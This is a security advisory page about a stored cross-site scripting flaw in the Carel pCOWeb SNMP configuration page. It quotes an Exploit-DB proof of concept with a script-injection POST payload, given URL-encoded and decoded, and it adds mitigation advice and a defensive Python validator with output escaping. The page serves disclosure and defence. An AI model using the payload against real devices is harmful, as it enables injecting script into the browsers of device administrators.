Vendor: Carel pCOWeb
By: Luca.Chiou
CVSS: 5.5 (MEDIUM)
Stored XSS (CWE-79)
Product Name: Carel pCOWeb
Affected Version From: all versions prior to B1.2.1
Affected Version To: B1.2.1
Patch Exists: YES
Related CWE:
CPE: a:carel:pcoweb
Metasploit:
Other Scripts:
Platforms Tested: Proprietary devices
2019

Carel pCOWeb – Stored XSS

In the Carel pCOWeb web interface, a user can modify the system configuration through /config/pw_snmp.html. An attacker can inject XSS code in the POST data. The injected code is stored in the database and runs when the stored value is rendered, which makes this a stored XSS vulnerability.

Mitigation:

Implement input validation and sanitization techniques to prevent XSS attacks. Apply security updates to upgrade to version B1.2.1 or higher.
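One way to apply the mitigation above, as an added example (not Carel's code and not part of the original advisory): check each setdb write against an allow-list before storing it, and HTML-encode stored values on output. The allow-list pattern, the 64-character limit and the function names are assumptions.

```python
import html
import re
from urllib.parse import parse_qsl

# POST body from the proof of concept on this page (URL-encoded form data).
POC_BODY = ("%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29="
            "%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E")
# Constructed benign request for comparison.
BENIGN_BODY = "%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=admin%40example.com"

# Key format seen in the PoC: ?script:setdb('<table>','<field>')
SETDB_KEY = re.compile(r"\?script:setdb\('([a-z0-9_]+)','([a-z0-9_]+)'\)")
# Assumption: SNMP contact/location text needs only these characters, max 64.
SAFE_VALUE = re.compile(r"[A-Za-z0-9 ._@+-]{0,64}")


def check_post_body(body):
    """Split a form-encoded body into accepted and rejected setdb writes."""
    accepted, rejected = [], []
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = SETDB_KEY.fullmatch(key)
        if m and SAFE_VALUE.fullmatch(value):
            accepted.append((m.group(1), m.group(2), value))
        else:
            # Unknown key shape or value outside the allow-list: do not store.
            rejected.append((key, value))
    return accepted, rejected


def render_field(value):
    """Second layer: encode on output so values already stored are inert."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for body in (POC_BODY, BENIGN_BODY):
        ok, bad = check_post_body(body)
        print("accepted:", ok, "rejected:", bad)
    print(render_field(check_post_body(POC_BODY)[1][0][1]))
```

Output encoding matters even with the input check in place, because values written before the check was deployed are still in the database.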

Exploit-DB raw data:

# Exploit Title: Carel pCOWeb - Stored XSS
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.carel.com/
# Version: Carel pCOWeb all versions prior to B1.2.1
# Tested on: It is a proprietary device: http://www.carel.com/product/pcoweb-card

# 1. Description:
# In the Carel pCOWeb web page,
# a user can modify the system configuration by accessing /config/pw_snmp.html.
# Attackers can inject malicious XSS code in post data.
# The XSS code will be stored in the database, which causes a stored XSS vulnerability.

# 2. Proof of Concept:
# Browse http://<Your Modem IP>/config/pw_snmp.html
# Send this post data:
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
# The post data in URL decode format is:
?script:setdb('snmp','syscontact')="><script>alert(123)</script>